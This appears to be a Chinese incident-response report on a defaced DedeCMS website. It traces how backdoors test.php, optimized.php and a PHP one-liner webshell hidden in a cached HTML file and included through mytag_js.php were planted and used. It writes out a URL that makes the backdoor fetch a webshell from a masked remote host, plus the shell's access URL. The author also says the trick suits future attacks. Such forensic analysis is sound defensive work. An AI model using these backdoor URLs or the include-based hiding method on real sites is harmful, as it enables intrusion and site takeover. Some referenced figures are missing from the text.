应急响应实例分享 conv.docxVIP

页面篡改应急事件记录

TIDE实验室

1.事件简述

某天，发现网站被百度提示页面部分已被非法篡改。

通过查看百度快照，发现网站首页确实被篡改，插入内容被编码，解码内容

如下

从上可确认，网站确实存在页面篡改情况。

2.排查过程

本次的排查过程还是很有趣的，中间还是有好多雷点，首先登录网站管理后

台，发现网站首页篡改时间为10月6号

通过对日志进行分析发现攻击者通过test.php写入optimized.php后门，写

入时间为06/Oct/2019:13:01:36

test.php写入时间为2019年10月6号

test.php具体内容如下，可利用该后门通过访问如下链接

//plus/test.php?id=http://xx.x.xx.xx:xxx/s/admine21.txt，生成optimized.php大马，访

问optimized.php，输入密码可成功登录该木马程序，这也可做为我们日后攻击写马的方

法

在对日志进行进一步分析，来确定test.php是如何写进服务器。开始在日志中发现了

如下记录

看到这个好兴奋呀，结果解码之后才发现不是test.php内容，解码内容如下

在日志中还看到了攻击者还尝试紧接着对moon.php做了一次请求，结果由于没有写

进去，系统返回了404。

接着又存在一条，看状态码是写入成功了

解码内容如下

从日志中可看到在写入成功后紧接着进行了一次访问

但我尝试访问时，发现mytag_js.php文件已经被删除，由于不能远程登录服务器无

法判断文件的改动情况，只能利用现有资源翻目录看日志了。

通过分析查找，在Data/cache目录下发现mytag-511348.html，最早的写入时间可以

追溯到2017年。

打开该文件内容为含有php一句话菜刀马的html页面

开始以为这只是个含有一句话木马的html，没把他当回事，一个html能有干啥呢，

但是当分析日志发现有关于511348的访问记录。

单独的html页面还不足以成为后门，但是通过结合mytag_js.php文件就有了大用处，

通过查看源码未发现mytag_js.php文件，从日志中也可看到之后在对mytag_js.php进行

访问，服务器就已经响应404了，可见攻击者已经删除了该文件。

从之前的源码备份中找到了mytag_js.php，具体内容如下

攻击者只需要访问http://x.x.x.x//plus/mytag_js.php?aid=511348,就可以连接一句话

木马了，本地搭建环境测试了下确实可以利用菜刀连接上，从日志中也可以看到确实能

连接成功，从数据包的大小，可看到攻击者利用该菜刀马做了一系列操作。

此处攻击者巧妙的利用文件包含的方式隐藏后门，这确实是种不错的方法，一般很

少有杀毒软件会对html的进行查杀。

到此为止就是要进一步排查mytag-511348.html是如何被写入的，接着日志分析，当

对日志追踪到9月29中午12:35:58分，在做进一步分析时，未发现29/Sep/2019:11:08:32

到12/Jul/2019:09:40:01之间的日志，所以最终也无法确定是通过什么方式上传的第一个

恶意文件。由于采用了DedeCMSV57_UTF8_SP2?2004-2011版本，只能从日志中判断出

是利用织梦的漏洞对系统实施攻击。

另外在data目录下tplcache目录中还发现了其他的php一句话木马，最早的时间基

本都可以追溯到17年，建议删除相关目录下后门程序、删除/plus/ad_js.php

/plus/mytag_js.php两个文件、删除data/cache下的缓存文件。